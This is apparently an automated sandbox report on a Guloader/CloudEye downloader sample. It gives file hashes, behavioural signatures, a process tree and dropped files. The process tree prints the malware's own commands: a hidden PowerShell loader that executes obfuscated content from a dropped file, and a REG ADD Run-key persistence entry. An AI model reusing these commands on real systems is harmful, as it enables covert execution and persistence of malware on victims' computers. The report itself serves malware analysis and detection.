Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    09-07-2024 10:02

General

  • Target

    MalwareBazaar.exe

  • Size

    401KB

  • MD5

    f1043033237fa935ef9af72415e657a1

  • SHA1

    b1ce2973b99811fe469ae6b4c450e97d4d4f4a20

  • SHA256

    a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7

  • SHA512

    1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b

  • SSDEEP

    6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe
    "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:588
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:820
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:2304

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Skyldsttendes.Und

    Filesize

    350KB

    MD5

    be381f7baf52513e52dfed9361a6dc69

    SHA1

    a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a

    SHA256

    caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79

    SHA512

    c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a

  • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp

    Filesize

    69KB

    MD5

    8172795f7c8cfb7cc597e879d2b0b468

    SHA1

    811797a9309a1bc3429f3bc7735eb6af1a7c80dc

    SHA256

    5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c

    SHA512

    9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322

  • memory/588-46-0x0000000001670000-0x0000000003EAF000-memory.dmp

    Filesize

    40.2MB

  • memory/588-23-0x0000000000600000-0x0000000001662000-memory.dmp

    Filesize

    16.4MB

  • memory/2816-18-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-15-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-11-0x0000000074081000-0x0000000074082000-memory.dmp

    Filesize

    4KB

  • memory/2816-14-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-20-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-21-0x00000000067C0000-0x0000000008FFF000-memory.dmp

    Filesize

    40.2MB

  • memory/2816-22-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-13-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-12-0x0000000074080000-0x000000007462B000-memory.dmp

    Filesize

    5.7MB